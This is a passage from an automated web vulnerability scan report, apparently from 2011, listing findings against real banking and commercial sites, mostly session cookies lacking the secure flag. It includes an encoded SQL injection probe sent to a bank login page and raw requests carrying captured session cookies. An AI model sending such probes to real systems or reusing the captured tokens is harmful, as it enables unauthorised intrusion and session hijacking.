Date: Tue, 26 Apr 2011 01:35:22 GMT
Server: Apache/2.2.3 (Red Hat)
Location: http://learn.bridgefront.com/login.jsp?reason=keyfailed
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


8.3. https://www.fs.ustrust.com/login/login.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.fs.ustrust.com
Path:   /login/login.aspx

Request

GET /login/login.aspx?sgt=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fs.ustrust.com
Cookie: Bear=TVWFHBJKf7TC1zhoN6cKOOPAr8xtme3QHkMKm7C73mI=
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS
Date: Tue, 26 Apr 2011 12:28:23 GMT
Content-type: text/html

<HEAD><TITLE>403: Access Forbidden</TITLE></HEAD>
<BODY><FONT COLOR="#CC0000"><b>Due to the presence of characters known to be used in Cross Site Scripting attacks, access is forbidden. This web site
...[SNIP]...

9. SSL cookie without secure flag set  previous  next
There are 43 instances of this issue:


9.1. https://account.snap.com/signup.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://account.snap.com
Path:   /signup.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signup.php HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: http://www.snap.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:49:28 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Set-Cookie: PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-t
...[SNIP]...

9.2. https://landingpage.leads.dynamicssite.com/PostLead.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://landingpage.leads.dynamicssite.com
Path:   /PostLead.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PostLead.aspx HTTP/1.1
Host: landingpage.leads.dynamicssite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 410 Gone
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: sbosSession=473982fb-74e6-4678-9919-c52e596ea5bc; path=/; HttpOnly
Set-Cookie: ClientSettings=ClientLocaleList=en~en-US&WebSource=UNKNOWN&WebDestination=UNKNOWN&WebDestinationVersion=DEFAULT; path=/; HttpOnly
Set-Cookie: Version=1.0.0.0; path=/; HttpOnly
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Tue, 26 Apr 2011 12:40:24 GMT
Connection: close

The page you requested was removed.

9.3. https://militarybankonline.bankofamerica.com/efs/servlet/military/login.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://militarybankonline.bankofamerica.com
Path:   /efs/servlet/military/login.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /efs/servlet/military/login.jsp HTTP/1.1
Host: militarybankonline.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; throttle_value=35

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:25:55 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: max-age=0, must-revalidate
Expires: 0
Set-Cookie: JSESSIONID=0000ypPn6NjbViQ1Q6CVbHfcliE:13393tt7e; Path=/
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 12807


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<noscript>
<META H
...[SNIP]...

9.4. https://secure.opinionlab.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 4176
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSSARBAA=IDMHJNCDAGKPHFPBJELDADJB; path=/
Date: Tue, 26 Apr 2011 12:45:31 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>OnlineOpinion</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=Windows-1252">
<STYLE>
<!--
.main {FONT-FAMILY: Arial, Helvetica, Sans-serif; FONT-SIZE: 10
...[SNIP]...

9.5. https://secure.opinionlab.com/ccc01/comment_card_d.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card_d.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/comment_card_d.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6067
Content-Type: text/html; Charset=UTF-8
Set-Cookie: ASPSESSIONIDSSSARBAA=MFMHJNCDOEKIPAJALGIFIFEG; path=/
Date: Tue, 26 Apr 2011 12:45:42 GMT
Connection: close

<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment Ca
...[SNIP]...

9.6. https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card_json_4_0_b.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/comment_card_json_4_0_b.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 8179
Content-Type: text/html; Charset=UTF-8
Set-Cookie: ASPSESSIONIDSSSARBAA=ICKHJNCDOCHODDPLMDGOHIIG; path=/
Date: Tue, 26 Apr 2011 12:41:00 GMT
Connection: close

<!--TEMPLATE version 3.6 UNIVERSAL CSS ON PAGE b: 0 ...--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<titl
...[SNIP]...

9.7. https://support.sentrigo.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.sentrigo.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: support.sentrigo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSd27384b3a2299db58d67110ef35da57a=kg3uc9rp83bgra0g4d9ddtn3i3; _mkto_trk=id:172-VIM-170&token:_mch-sentrigo.com-1303780496241-25669; __utmz=75719754.1303780499.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=75719754.1100420185.1303780499.1303780499.1303780499.1; __utmc=75719754; __utmb=75719754.1.10.1303780499

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:22:03 GMT
Server: Apache
Set-Cookie: PHPSESSID=anqbi8c98lhrc9t5dv43unlak6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4223
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script language="JavaScri
...[SNIP]...

9.8. https://www.bankofamerica.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:22:51 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=F07EDA8E6FFF106F205CB01178307684; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=F07EDA8E6FFF106F205CB01178307684; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:22:51 GMT
X-FRAME-OPTIONS: DENY
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000rarhzzt74SRcLv3FkL64au2:15pp20g5d; Path=/
Set-Cookie: BOA_0020=20110426:0:O:49008707-c17e-4746-931599acf898a369; Expires=Sat, 26 Apr 2031 12:23:11 GMT; Path=/; Domain=.bankofamerica.com
Set-Cookie: CONTEXT=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: INTL_LANG=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: LANG_COOKIE=en_US; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 47814


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...

9.9. https://www.bankofamerica.com/homepage/WidgetAction.go  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /homepage/WidgetAction.go

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /homepage/WidgetAction.go?requestType=display&divId=36094CED-7EDF-11DF-889C-00144F3EA4A4%2C360925D9-7EDF-11DF-889C-00144F3EA4A4%2C3608FEC5-7EDF-11DF-889C-00144F3EA4A4%2C36099B13-7EDF-11DF-889C-00144F3EA4A4&isWidget=true&targetedAdParams=%7B%7BmoduleId%3B%3BEQ%3B%3B36094CED-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7CD3AAA0A1-E38E-11DF-B16B-00144F3EA4A4%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-service-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B36094CED-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D%3B%3BMODSEP%3B%3B%7B%7BmoduleId%3B%3BEQ%3B%3B360925D9-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7C18A00502-E390-11DF-B16B-00144F3EA4A4%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-service-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B360925D9-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D%3B%3BMODSEP%3B%3B%7B%7BmoduleId%3B%3BEQ%3B%3B3608FEC5-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7CB48EEC16-0060-11DF-B411-00144F25F968%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-service-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B3608FEC5-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D%3B%3BMODSEP%3B%3B%7B%7BmoduleId%3B%3BEQ%3B%3B36099B13-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7C3619DDB0-E38E-11DF-B16B-00144F3EA4A4%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-media-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B36099B13-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D&previousPageId=3601F9E2-7EDF-11DF-889C-00144F3EA4A4&callback=jsonp1303820701740&_=1303820711776 HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/homepage/overview.go
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; throttle_value=35; cmTPSet=Y; state=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:40:36 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: DENY
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000UmJOHI37nHLwr8Y5Et_eIFR:15bvh4t33; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 4929

jsonp1303820701740({widgetdata:[{htmlsrc:'                                                     <!-- sm1.2one -->                                                        <div class="links-list-module">    <div class="column-co
...[SNIP]...

9.10. https://www.bankofamerica.com/homepage/overview.go  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /homepage/overview.go

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /homepage/overview.go HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/Control.do?body=selectState&section=onlinebanking_enroll
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; throttle_value=35; cmTPSet=Y; cmRS=&t1=1303820662510&t2=1303820667589&t3=1303820694026&t4=1303820634257&lti=1303820694026&ln=&hr=javascript%3Adocument.stateSelectForm.submit%28%29%3B&fti=1303820694029&fn=state%20selector%20page_stateSelectForm%3A0%3B&ac=0:S&fd=0%3A3%3Astate%3B&uer=&fu=https%3A//www.bankofamerica.com/ProcessUser.do&pi=state%20selector%20page&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; state=MA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:24:50 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: DENY
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000dPG6ydQHxVjJLDzLY5rQEzC:157dm9o29; Path=/
Set-Cookie: CONTEXT=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: INTL_LANG=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: LANG_COOKIE=en_US; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 47731


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...

9.11. https://www.bankofamerica.com/homepage/stateSelect.go  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /homepage/stateSelect.go

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /homepage/stateSelect.go HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 12:46:50 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: DENY
Location: https://www.bankofamerica.com/content/documents/homepage/fail-over-state.htm
Content-Length: 0
Set-Cookie: JSESSIONID=00003O0kJlXrnqBcEyceskzwEx7:15povac7t; Path=/
Set-Cookie: state=""; Expires=Sun, 23 Oct 2011 12:46:49 GMT; Path=/; Domain=.bankofamerica.com
Set-Cookie: CONTEXT=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: INTL_LANG=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: LANG_COOKIE=en_US; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Via: On-Demand Router/1.0
Connection: close
Content-Type: text/plain
Content-Language: en-US


9.12. https://www.mysecureconnect.com/login.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.mysecureconnect.com
Path:   /login.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login.aspx HTTP/1.1
Host: www.mysecureconnect.com
Connection: keep-alive
Referer: http://www.secureconnect.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=g40h4p45omjxdryp2nasdx45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 23:57:56 GMT
Content-Length: 12063


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<!-- TCP80::HTTPStatus::OK --
...[SNIP]...

9.13. https://lct.salesforce.com/sfga.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://lct.salesforce.com
Path:   /sfga.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sfga.js HTTP/1.1
Host: lct.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/javascript
Date: Tue, 26 Apr 2011 12:40:18 GMT
Connection: close
Set-Cookie: BIGipServerlct-pool=171237898.38687.0000; path=/
Content-Length: 9247

var _kd = document;
var _kdlh = _kd.location.href;
var _ki,_kq,_kv;
var _kwtlForm;
var _kretURL;
var _kwtlOnSubmit;
var _koid;

function __krand() {
return Math.round(Math.random() * 256).toString
...[SNIP]...

9.14. https://olui2.fs.ml.com/login/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://olui2.fs.ml.com
Path:   /login/login.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login/login.aspx?sgt=3&_tps=53e1d1d2ef5543dabbbb6e0d12a34f8b HTTP/1.1
Host: olui2.fs.ml.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:28:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
geh-svr-hex: 65680608
Set-Cookie: Bear=lOEt4KgcVyTNtOFnrwpDlr8rCGj6G8KxVhb/yhftyUA=; domain=.fs.ml.com; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 89522


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head lang="en-us"><met
...[SNIP]...

9.15. https://securitymetrics.com/sm/PANscan/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sm/PANscan/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sm/PANscan/ HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA

